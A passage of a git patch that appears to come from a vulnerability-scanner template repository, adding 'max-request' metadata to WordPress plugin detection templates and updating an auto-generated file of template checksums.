b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 4fa6fc3ffe..5fae796fdd 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-paypal-payments/ metadata: + max-request: 1 plugin_namespace: woocommerce-paypal-payments wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 1c1c690fcd..22f812e2b8 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/ metadata: + max-request: 1 plugin_namespace: woocommerce-pdf-invoices-packing-slips wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index 4d6702d81a..c637006d26 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-services/ metadata: + max-request: 1 plugin_namespace: woocommerce-services wpscan: https://wpscan.com/plugin/woocommerce-services tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index 42cb8bc409..e020507ccb 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce/ metadata: + max-request: 1 plugin_namespace: woocommerce wpscan: https://wpscan.com/plugin/woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index 55d6effbf5..c92903fd79 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordfence/ metadata: + max-request: 1 plugin_namespace: wordfence wpscan: https://wpscan.com/plugin/wordfence tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 6786cab703..c25b2c1c48 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordpress-importer/ metadata: + max-request: 1 plugin_namespace: wordpress-importer wpscan: https://wpscan.com/plugin/wordpress-importer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 784ba22c8a..4d6dd14d25 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordpress-seo/ metadata: + max-request: 1 plugin_namespace: wordpress-seo wpscan: https://wpscan.com/plugin/wordpress-seo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 72ff55e58a..7ca0870ed6 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/worker/ metadata: + max-request: 1 plugin_namespace: worker wpscan: https://wpscan.com/plugin/worker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 8cfaa0f5a9..4f0d9be568 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-fastest-cache/ metadata: + max-request: 1 plugin_namespace: wp-fastest-cache wpscan: https://wpscan.com/plugin/wp-fastest-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index 85900a01a7..f3c481b824 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-file-manager/ metadata: + max-request: 1 plugin_namespace: wp-file-manager wpscan: https://wpscan.com/plugin/wp-file-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index a7ccde0b49..ba214fd7ea 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-google-maps/ metadata: + max-request: 1 plugin_namespace: wp-google-maps wpscan: https://wpscan.com/plugin/wp-google-maps tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 422664a98c..8f5fe8d9a5 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-mail-smtp/ metadata: + max-request: 1 plugin_namespace: wp-mail-smtp wpscan: https://wpscan.com/plugin/wp-mail-smtp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index f0af3a748a..0458b13354 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-maintenance-mode/ metadata: + max-request: 1 plugin_namespace: wp-maintenance-mode wpscan: https://wpscan.com/plugin/wp-maintenance-mode tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index f89f1a20b3..d570be07bf 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-migrate-db/ metadata: + max-request: 1 plugin_namespace: wp-migrate-db wpscan: https://wpscan.com/plugin/wp-migrate-db tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index 01fb12d0ad..ee05e3add8 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-multibyte-patch/ metadata: + max-request: 1 plugin_namespace: wp-multibyte-patch wpscan: https://wpscan.com/plugin/wp-multibyte-patch tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 1773857e15..df2487955f 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-optimize/ metadata: + max-request: 1 plugin_namespace: wp-optimize wpscan: https://wpscan.com/plugin/wp-optimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index bcd1509c68..79ff01211c 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-pagenavi/ metadata: + max-request: 1 plugin_namespace: wp-pagenavi wpscan: https://wpscan.com/plugin/wp-pagenavi tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index c6aca20a60..23414b3d1d 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-reset/ metadata: + max-request: 1 plugin_namespace: wp-reset wpscan: https://wpscan.com/plugin/wp-reset tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 810fc82cde..0178c8e9fb 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-rollback/ metadata: + max-request: 1 plugin_namespace: wp-rollback wpscan: https://wpscan.com/plugin/wp-rollback tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index 783d381ed8..a04ddc6003 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-sitemap-page/ metadata: + max-request: 1 plugin_namespace: wp-sitemap-page wpscan: https://wpscan.com/plugin/wp-sitemap-page tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 8bdc600063..2ead906817 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-smushit/ metadata: + max-request: 1 plugin_namespace: wp-smushit wpscan: https://wpscan.com/plugin/wp-smushit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index ab61cc0338..dedd2e23b6 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-statistics/ metadata: + max-request: 1 plugin_namespace: wp-statistics wpscan: https://wpscan.com/plugin/wp-statistics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 5f6fbc1f75..03cd7137a8 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-super-cache/ metadata: + max-request: 1 plugin_namespace: wp-super-cache wpscan: https://wpscan.com/plugin/wp-super-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml index d67150d038..a68d4b7d78 100644 --- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml +++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-user-avatar/ metadata: + max-request: 1 plugin_namespace: wp-user-avatar wpscan: https://wpscan.com/plugin/wp-user-avatar tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index beeba7ca69..bf9dfc3ad8 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpcf7-recaptcha/ metadata: + max-request: 1 plugin_namespace: wpcf7-recaptcha wpscan: https://wpscan.com/plugin/wpcf7-recaptcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index c225df7bfd..47911a86a5 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpcf7-redirect/ metadata: + max-request: 1 plugin_namespace: wpcf7-redirect wpscan: https://wpscan.com/plugin/wpcf7-redirect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index aaad04cb76..1c25b6f488 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpforms-lite/ metadata: + max-request: 1 plugin_namespace: wpforms-lite wpscan: https://wpscan.com/plugin/wpforms-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index ff750a7d2a..b36317acd8 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wps-hide-login/ metadata: + max-request: 1 plugin_namespace: wps-hide-login wpscan: https://wpscan.com/plugin/wps-hide-login tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index f1e7595ccd..5eb35dd17e 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpvivid-backuprestore/ metadata: + max-request: 1 plugin_namespace: wpvivid-backuprestore wpscan: https://wpscan.com/plugin/wpvivid-backuprestore tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 4b2769ee46..ceb2b8d600 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/yith-woocommerce-wishlist/ metadata: + max-request: 1 plugin_namespace: yith-woocommerce-wishlist wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist tags: tech,wordpress,wp-plugin,top-100,top-200 From 6fd51805d97de6e9a15328958bdafd2992d71d21 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 4 Jul 2023 05:44:12 +0000 Subject: [PATCH 320/609] Auto Generated Templates Checksum [Tue Jul 4 05:44:12 UTC 2023] :robot: --- templates-checksum.txt | 406 ++++++++++++++++++++--------------------- 1 file changed, 203 insertions(+), 203 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 0837de7724..630de26133 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3799,7 +3799,7 @@ http/iot/webcamxp-5.yaml:34b662576e2efdd2ddaef5267512848b8159f3e0 http/iot/webtools-home.yaml:8fac1b9a4c40b7a99a33895c75dcd2be623e1965 http/iot/xp-webcam.yaml:6a17a29da87ffe3b4a382c6ed2e4ca38c148e54e http/iot/zebra-printer-detect.yaml:3ac7d5f177a91a5ee89411ead8e073a72a10997e -http/miscellaneous/addeventlistener-detect:23e4444e90c97c5a5a0ae9a0c7da3a62923d258d +http/miscellaneous/addeventlistener-detect.yaml:23e4444e90c97c5a5a0ae9a0c7da3a62923d258d http/miscellaneous/apple-app-site-association.yaml:c6da929223cda667179226cfba083fc9692c7dac http/miscellaneous/aws-ecs-container-agent-tasks.yaml:169fca1a43acbc9c877b9c0c3df0141f2400d67e http/miscellaneous/clientaccesspolicy.yaml:d2ebcdf18a9e115d28ec5418618dde3de28439b6 @@ -5335,214 +5335,214 @@ http/technologies/weblogic-detect.yaml:e7cd5e93e7dd6c1625553aa3ad3c5b47e9bfb498 http/technologies/werkzeug-debugger-detect.yaml:d840275037a23f116bab272b6d7658cd9156e8af http/technologies/wms-server-detect.yaml:45c90b9c1ebd969c113b5226d8714e38434a6813 http/technologies/wondercms-detect.yaml:b485ce65e953f7a8d97fc2bdb7e8e81f9900b114 -http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed -http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e +http/technologies/wordpress/plugins/ad-inserter.yaml:dcc200a556b9acbe534e1602320c36a7de790bdd +http/technologies/wordpress/plugins/add-to-any.yaml:0a6b25111eae4afc694c46433e2c508ea2b90539 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:8602eaf564f6138e2a37576450107bfddbe34a51 http/technologies/wordpress/plugins/adminimize.yaml:3f8e114ab592d30a1d4195f22d46de3b9fc28ed0 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0 -http/technologies/wordpress/plugins/akismet.yaml:c2fc28f9352683a8951ff433fcd774b49feaf0eb -http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:65a31735844abbc42c6c38fb1b2ce66f3b70637e -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:c5fb4f5f04f4d44c858cce9bdcbe7f3606a68f65 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:6b1337d51ba70633ffcb1f7ee597e124cc495a61 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6c34983a451921b4871a71a257642648e00cdebc -http/technologies/wordpress/plugins/amp.yaml:3edc2817a56cd8ad27f32ec268ac6193395862f2 -http/technologies/wordpress/plugins/antispam-bee.yaml:fdc8552f09d28482637a53d5be385512a8d3ee12 -http/technologies/wordpress/plugins/astra-sites.yaml:99290366c13ca50eb0e8f80466e00581c822280b -http/technologies/wordpress/plugins/astra-widgets.yaml:f7265954d79f2976d51ea04401b8371971a8d226 -http/technologies/wordpress/plugins/autoptimize.yaml:e11ed09133228a907ca069378035ce38b4f72f77 -http/technologies/wordpress/plugins/backwpup.yaml:f465ab2fac2cb5d33cbb273e95c99d266ad6ac46 -http/technologies/wordpress/plugins/better-search-replace.yaml:08d9193490a1131216e86ec2dbcc5806db67bf61 -http/technologies/wordpress/plugins/better-wp-security.yaml:31ac060d2dac4ff16c700f62cce3e478c5f0f66f -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:55f69d7e5dca5a91d82d0908d11edf7be0cb1349 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0d81c1c43b8b4acd5ebad30efb116564a06d295f -http/technologies/wordpress/plugins/breeze.yaml:c366593628c83c9881d375890e07e63cfa8d552b -http/technologies/wordpress/plugins/broken-link-checker.yaml:df71812c7fa02109aba6905b6adde546c4ac0365 -http/technologies/wordpress/plugins/child-theme-configurator.yaml:2cb6529ade42bd6e577fa6f61a9f3d66cac32e4f -http/technologies/wordpress/plugins/classic-editor.yaml:fc682aceca9126c4e072c73ff29851a83979cd55 -http/technologies/wordpress/plugins/classic-widgets.yaml:17210161b9efea8396d8445ae4d4cba98e660ba4 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:0a881196a64744bda68c6f1c2681bfd2f84d0ce3 -http/technologies/wordpress/plugins/cloudflare.yaml:431bca4737941e71c01f7ab9ce8f7fc45c7670a2 -http/technologies/wordpress/plugins/cmb2.yaml:4b3bfa4f94b99997f974f02d6ba60bde2e9444ff -http/technologies/wordpress/plugins/coblocks.yaml:a26991d803bee4cd24a8fee62e7eea4c1bb2d43a -http/technologies/wordpress/plugins/code-snippets.yaml:d1187e6e58951bbe1df401c1672bfdff86f7422e -http/technologies/wordpress/plugins/coming-soon.yaml:516f9d73fc15789a4c0fd099fc7e4a95fdb0f14f -http/technologies/wordpress/plugins/complianz-gdpr.yaml:eabd8b2e7f97de8a60b3a5fb96527910bbbad58d -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:f28aad38a4e879235502a3c7abc1eaac996a53af -http/technologies/wordpress/plugins/contact-form-7.yaml:7ce85ff130f51b9380933293b884a7bd421404eb -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:6acd231ac9daa0db29c8cd2ffc15f41bc9ababfb -http/technologies/wordpress/plugins/cookie-law-info.yaml:1105f8252666a84437fde4945cb5a745ad4cc50e -http/technologies/wordpress/plugins/cookie-notice.yaml:b9cf44d527d7f63a289ac0abad8b1bf0391c678c -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:fd3988a6aa03120a677f1ac21834661ce302bf06 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:9e9f37e33437158126c61d2345001ba7d43111e7 -http/technologies/wordpress/plugins/custom-css-js.yaml:ac02742559638f742970cf6f592b71ef94d7f9e0 -http/technologies/wordpress/plugins/custom-fonts.yaml:b5239c6679c226595580307f84fbc3db513ed75c -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:e185e81e02d08d559172e553c9f18124e8b73cf9 -http/technologies/wordpress/plugins/disable-comments.yaml:09bef99b79703f8fb60a432875789f36c26d7606 -http/technologies/wordpress/plugins/disable-gutenberg.yaml:589db5b5a0c17c5eaa8aed3193f9b69c9c23d157 -http/technologies/wordpress/plugins/duplicate-page.yaml:d686911fad8f2cb38247ac68abde6798a75b3d1a -http/technologies/wordpress/plugins/duplicate-post.yaml:95098c9e322716725f42517fa291102be287a7b5 -http/technologies/wordpress/plugins/duplicator.yaml:492e234d249eac52e0108c1bef2ecd318f8264a7 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:f4ad26e875f78de817b30426b87b4a68cbaeaea2 -http/technologies/wordpress/plugins/easy-fancybox.yaml:e7f7398e360ec865076174206ebfa8588fe9d55e +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:9f506de2bcca6885f35c46248b4504aaad538724 +http/technologies/wordpress/plugins/akismet.yaml:b007755cc48a7a531a0e8fa3c452f9f74b483a5c +http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:8afc7d83bef5b26cba75228a1713dfa60348deba +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:0010ec5c05b69f5ebddee94a9ce0d4b57e44ff27 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:c3da676f6d0fa160cc7394abf4c7d8daf4f0fe96 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:f06de6db272be3eaa03e68865e41fd8cd0889d6e +http/technologies/wordpress/plugins/amp.yaml:6e95aadb383bc37245be179768ef3666595c84d4 +http/technologies/wordpress/plugins/antispam-bee.yaml:cbc2eb83f595229655ccae5e68e201f8fbbdfc3f +http/technologies/wordpress/plugins/astra-sites.yaml:88922bff5ff8b290d2e3d0dff8a85a3a3b71be07 +http/technologies/wordpress/plugins/astra-widgets.yaml:ae52d4e01aa55255f0351c2ebf24e5f6a05f46c1 +http/technologies/wordpress/plugins/autoptimize.yaml:279ce12aeb07a219ddde6d8d3b8bdfe7854b545c +http/technologies/wordpress/plugins/backwpup.yaml:cd98534e9f211629ba533369d19b35889d667dff +http/technologies/wordpress/plugins/better-search-replace.yaml:f0fb1b87ddb8ba11b1b34fc352dcfe60ec8bd32a +http/technologies/wordpress/plugins/better-wp-security.yaml:366bc515c9eea0caf24103811f783af87309bc1e +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:cf370287b480191433f14d22645180352e012309 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:1d9ebeb7f6912abd70c1d5ff211c9bc312e8437c +http/technologies/wordpress/plugins/breeze.yaml:c9d3a0b31311eeb12035b292ea0beb6de100161d +http/technologies/wordpress/plugins/broken-link-checker.yaml:3632271104d26b8bca780450cc8bda6c00a2904a +http/technologies/wordpress/plugins/child-theme-configurator.yaml:3346ba95537fd3c405732fb81d7d459a22cd7eae +http/technologies/wordpress/plugins/classic-editor.yaml:7eac99fe2332bcd2d61540094502911352f9b299 +http/technologies/wordpress/plugins/classic-widgets.yaml:e5b45b37d0a85fd0e54c21716ca57f5ade443aa7 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:9e23b288bbe247ec7fc8a1ee5be22e37886f5fd9 +http/technologies/wordpress/plugins/cloudflare.yaml:66dcdb39cea465cbf038ff429f48620493d09369 +http/technologies/wordpress/plugins/cmb2.yaml:eb137984c82ed5d64c29685b14a6c20d443be844 +http/technologies/wordpress/plugins/coblocks.yaml:0b67f9d55e292e698889ac4b63809c2468d3ed2c +http/technologies/wordpress/plugins/code-snippets.yaml:69feff2b5e8275ebd75f53eff59ee2a912f26636 +http/technologies/wordpress/plugins/coming-soon.yaml:679f3b88eb2da31b32e3180cceccd25d7f60e86e +http/technologies/wordpress/plugins/complianz-gdpr.yaml:35ff2d819699fc3c4d35d44702d09ec841fdb61d +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:81b00a965871cb891ebfbbc4a1368692c89c106a +http/technologies/wordpress/plugins/contact-form-7.yaml:ed800082cc23cf6479f6cc46302bbf76f3a514ef +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:a54ed3ad529d498c2c8b8c0d46b2794a2a729e4f +http/technologies/wordpress/plugins/cookie-law-info.yaml:3bd4cc6049acf423c429e570491594ff3b5007a7 +http/technologies/wordpress/plugins/cookie-notice.yaml:198f4bf51ae86e3bbea603b127caca8f2e5a9057 +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:373d91b4dd303509b7cab8348231294d9ea8cbb3 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:2b73cbbc4598fa9184ea8d3c52b166fc6fee1459 +http/technologies/wordpress/plugins/custom-css-js.yaml:b6291ea7e296f32148ed13099711f9c9f0a2f3ad +http/technologies/wordpress/plugins/custom-fonts.yaml:406c61fa1dbba79b5b47c44d0b972dd409aecf8c +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:15eff4815c8fec2b7907295243812d1f51b1697f +http/technologies/wordpress/plugins/disable-comments.yaml:b7fbaf360dc5246357ccdc9e819d384238cddbb7 +http/technologies/wordpress/plugins/disable-gutenberg.yaml:6af6a0b5b5d096f9563c30a4fd20e0cff5ae03d0 +http/technologies/wordpress/plugins/duplicate-page.yaml:aadea56bc4af197b7e6a6c3f374358b6e0af09af +http/technologies/wordpress/plugins/duplicate-post.yaml:81174cfbdf40b99a59b5d60a4451a7124506825a +http/technologies/wordpress/plugins/duplicator.yaml:f8cffcb16fc6b08355823d28e32a79daa7549677 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:d855708559e81537cb85f5acc6bace4c0d4b3121 +http/technologies/wordpress/plugins/easy-fancybox.yaml:e41968a186a45de3a74a86d93ee1967c67ce7984 http/technologies/wordpress/plugins/easy-google-fonts.yaml:7f9b02d3513ca7ddbcb4bf0c320b049328a8bc45 -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d3c9f699fb74e4dc40d444164fa0494e1cf074b7 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:3b1527653b38dd2d7f394cc9533036489f9fce72 -http/technologies/wordpress/plugins/elementor.yaml:d4492f2c80f46cd5b7504d20216f6b04cb6f8e77 -http/technologies/wordpress/plugins/elementskit-lite.yaml:e860f44f9333f49b1db0078924daae6638877ffb -http/technologies/wordpress/plugins/enable-media-replace.yaml:68642f24029f3db57cae0875e14691319d3b70c8 -http/technologies/wordpress/plugins/envato-elements.yaml:7c6694d04e8f12566bae8c1a88d3b72af93d5bc1 -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:0901f4c382a1bac147c98dc2e9eff2b4ddb7df8d -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:1ab8aca4a953aa2c5d9a4d194e2dd542fc2f30a0 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:de8926a47352fc0663b8fda59114cadbadfccc30 -http/technologies/wordpress/plugins/fast-indexing-api.yaml:f8910398d8ff2b72d2cbed02c12969f91f1a98bb -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:30f4140ccdd9537b0c43406fe41bafe606d3bc9f 